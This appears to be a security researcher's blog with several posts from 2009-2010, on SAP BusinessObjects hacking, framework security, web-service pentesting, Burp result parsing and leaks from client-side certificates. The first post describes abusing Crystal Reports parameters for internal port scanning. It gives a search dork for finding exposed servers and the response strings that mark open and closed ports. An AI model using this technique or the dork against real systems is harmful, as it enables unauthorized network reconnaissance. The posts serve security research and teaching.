Internal Port Scanning via Crystal Reports

December 2, 2010

Another fun attack that willis and I found during our SAP BusinessObjects research is that we could do internal port scanning by using Crystal Reports.

The way this works is that when you browse to a Crystal Reports web application (http://hostname/CrystalReports/viewrpt.cwr) there are a few parameters which are used to communicate with the SAP services on the backend. The problem here is that these parameters are controlled by the user. Now a better way to do this is to provide a drop-down list or make all the configurations done by the server.

Now the user can modify the IP and port which the web application is trying to communicate with on the backend. By default the port is 6400. Now the ability to modify the IP and port is good. The next step is to map the responses to open and closed so that we could programmatically map out the internal network.

Here are a few nice Google Dorks:
filetype:cwr inurl:apstoken

Here is the resulting mapping :


Port Open Response:
# Unable to open a socket to talk to CMS $HOSTNAME:445 (FWM 01005)


Port Closed Response :
# Server $HOSTNAME:80 not found or server may be down (FWM 01003)

Lastly the only thing we need to do is to modify the IP and port to whatever we are trying to scan. This is faster than using BeEF’s JavaScript internal portscanning functionality and it doesn’t require client interaction. Pwn dem v0hns!



Security-patching Common Web Development Frameworks

November 22, 2010

A few weeks ago at OWASP AppSec DC we made progress on an idea that several of us (@RafalLos, @secureideas, @securityninja, @TheCustOS) have been talking about on twitter for a while. The idea is based on trying to determine a good solution to what we see as the general brokenness of the Internet’s web applications. Not only do we see current applications as badly broken but the velocity at which developers are building new insecure web application is increasing. The panel that we hosted at OWASP AppSec DC discussed one method which we can contribute to reduce the rate at which new, insecure web applications are being developed.

Our idea is based on improving the security of existing web application development frameworks; adding security components into their core, thus making security more transparent to the developer and potentially having the effect of producing more secure web applications.

While there are certain elements of WebAppSec which will help to reduce the volume and impact of vulnerabilities such as training; training simply hasn’t proven to be a solution which scales well. The root of the problem with training is that the number of developers in the world is many orders of magnitude more than the number of WebAppSec trainers. The trainers are also limited due to several factors such as the need to understand language-specific constructs and limitations and the need to constantly keep up with changing development methodologies. This drastically impacts the pool of qualified, available trainers.

There are two factors which we need to address so that everyone is clear the types of vulnerabilities we want to cover and how we will improve existing frameworks. Trying to fix all WebAppSec vulnerabilities programmatically is an arduous and complex task. Therefore, we have decided to focus on form-based attacks (SQLi, XSS etc). Our approach will focus strictly on the types of flaws which can be readily addressed with minimal impact to the framework structure, and coding principles of the framework.

Next we have to cover which frameworks, and the versions we will try to improve. From the panel discussion, the consensus is that it is important for us not to focus on adding security to legacy versions of the frameworks since this would be a losing battle which isn’t really worth fighting since developers will over time likely be moving to newer versions of the frameworks with the applied fixes.

The core idea is to improve existing development frameworks by adding security controls into the upstream version of the framework. This means that as the framework is improved with additional features which developers will want, they will have the added benefit of getting a more secure framework “right out of the box”. We understand that developers have little incentive to produce more secure code over meeting their often aggressive release deadlines. Making the frameworks incorporate security is very important, and I think the ideal way to reduce the rate at which vulnerable web applications are being developed by making it more difficult for developers to write insecure code. This change means that from a business perspective the negative time and productivity impact to write “more secure code” is reduced… Our goal is to make the applications being developed more secure, by making security less visible and requiring less effort. We feel this will be the most effective and impactful method of raising overall web application security – by making it simple and (nearly) transparent for developers. We know developers don’t write poorly secured code on purpose, so by making security easier on them, there is a greater chance of the final product having a higher level of software security. It may not be possible to make the entire Internet secure but if we can change the velocity at which new, vulnerable web applications are being developed then we are really making huge strides toward a more secure Internet.

Perhaps the most important question is now that we have an acceptance of our idea – what do we do first? Clearly, step one is gaining community support. I’m not 100 % sure that creating a new OWASP project is the best method… The alternative to this is to use another site like Google groups and/or something similar for managing our efforts.

We welcome community input! Please feel free to leave comments. We are looking forward to see what other people in the community have say about these ideas.

Pentesting Web Services

November 21, 2010

Recently, I have been doing a few presentations with Will Vandevanter (@willis__) talking about Hacking SAP BusinessObjects. As a reference to anyone who hasn’t seen the presentation I thought it would be useful to do a few follow-up blog posts to clarify a few topics in greater detail.

The essence of the presentation was focused on pentesting SAP’s Service Oriented Architecture (SOA). There are two common ways to do SOA (SOAP and REST). The method used by SAP BusinessObjects is SOAP. For anyone that isn’t familiar with SOAP, just think of XML messages on top of HTTP. Below is a simple ruby client that makes a SOAP request to the web service. There are a few things which make this sample very useful to anyone that is performing a penetration test. The first is the request / response are stored in txt files. This is useful to logging and manual review of details. The second, is that the request is made using a local proxy on 8080/tcp (BurpSuite, WebScarab etc.).

By using a proxy the pentester can have fine grained control of the request. Even though BurpSuite doesn’t have built-in web services support, pentesters can still use the proxy to intercept requests since it’s just HTTP. The way this works is to intercept a SOAP request then utilize the intruder to fuzz any perimeters in the the web service. Pentesters also use BurpSuite (or w/e proxy) to perform replay requests and perform PRNG testing (similar to session id testing)

Sample Ruby SOAP client

Let me know what you think. What methods are you using to pentest web services? What tools do you use ? Comments welcome!

Hack the Planet!


Sans Pentest Summit 2010 – Goal Oriented Pentesting

August 4, 2010

Back in June, I was in Baltimore for the SANS Pentest Summit 2010. I really enjoyed this conference, since it provided the opportunity to chat with many people that are working on ways to improve the penetration testing process. At the conference, I presented the Goal Oriented Pentesting theory that I have been talking about for a while(first post, second post) The talk expanded upon the original theories by incorporating specific methods which provided criteria for anyone that is looking to implement Goal Oriented Pentesting in their security assessments. I also included examples from several security assessments that I have performed (external pentesting, internal pentest and web app audit) so that attendees would be able to use these goals a guide in the future.

The slides from the talk can be found here.

What else should be done to improve upon this? Let me know what you think!

OWASP AppSec 09 – Synergy! A world where the tools communicate

November 3, 2009

On November 12th, I will be giving a talk at the annual OWASP AppSec conference titled “Synergy! A world where the tools communicate”. I am really excited to give this talk since I have been working on the content for almost 2 years. If you have attended any of my talks in the past like BlackHat/DefCon, ShmooCon and/or InfoSec World you already know that I will bring tons of fresh code! I can’t wait for OWASP AppSec 09.

Brace yourself. We are gonna raise the bar on the industry.


Burpsuite::Parser 0.01

October 15, 2009

Just to get everyone excited for my talk, “Synergy! A world where the tools communicate” at OWASP NYC today, I decided to release Burpsuite::Parser 0.01 a little early.

Here is an example of using the module:

my $bpx = new Burpsuite::Parser;
my $parser = $bpx->parse_file('burpsuite.xml');
#a Burpsuite::Parser Object
my @results = $parser->get_all_issues();
#an Array of Burpsuite::Parser::Issue Objects
foreach my $h ( @results ) {
     print "Severity: " . $h->severity . "\n";
     print "Host: " . $h->host . "\n";
     print "Name: " . $h->name . "\n";
     print "Path: " . $h->path . "\n";
     print "Proof of Concept:\n " . $h->issue_detail . "\n";

Version 0.01 of the module can be found at

One good thing to note, all of the request/responses are automatically included in the XML. To reduce the size of the XML, it may be helpful to generate an XML file without them. This will make parsing faster.


Client-Side Certs – Oh my!

October 12, 2009

One of the techniques demonstrated during the BlackHat/DefCon talk I gave with RSnake was utilizing client-side certificates. Client-side certificates allow for a client to gain a certain amount of trust for the server in which they are connecting. They are used by companies that don’t want to worry about using tokens, so instead they use client-side certificates. Client-side certificates are also used by several sslvpn devices.

To demonstrate client-side certificates, I first needed to create a few certificates so the client could connect to the server.

Using openssl, I created the certificate:
openssl req \
-x509 -nodes -days 365 \
-newkey rsa:1024 -keyout mycert.pem -out mycert.pem

Next, I needed to setup the server to use the certificate. I started thinking about he easiest way to accomplish this goal. It occurred to me that instead of using Apache, I should use the built-in webserver in openssl. This made setup easier, since I replaced Apache with a single command

Here is an example:
openssl s_server -accept 443 -cert mycert.pem -www -verify 10

Finally, I setup a client and verified that the browser contained a client-side certificate for ANOTHER server. Therefore, there is no trust relationship between the public key within the client’s browser and the openssl server. The key is the browser, will ask to send the public key everytime! The only thing an attacker needs to do, is to be listening on the wire and intercept the public key.

Now you may ask, “who cares about the information in a public key?” Well, client-side certificates can contain the following information:

  • Email Address (perhaps a valid username)
  • Hostname and maybe OS of the server
  • Date the Certificate was Issued
  • Date the Certificate Expires

Sometimes, the email address being used contains the user’s name. For example, many organizations standardize on a common email schema to construct email addresses. For example, they may use some variation of the first and last name of the employee.


  • [firstname].[lastname]
  • [firstname]-[lastname]
  • [firstname]_lastname]

If this is the case, an attacker can extract this information and now the attacker knows the user’s full name. For the purposes of achieving remote access, it is only a piece of the puzzle.
The next piece of information was the date the certificate expires. Since we know of a valid email, it is possible this is also a valid username for a network based attacks. Putting both the username and dates together means that the attacker has a greater likelihood for performing a successful attack.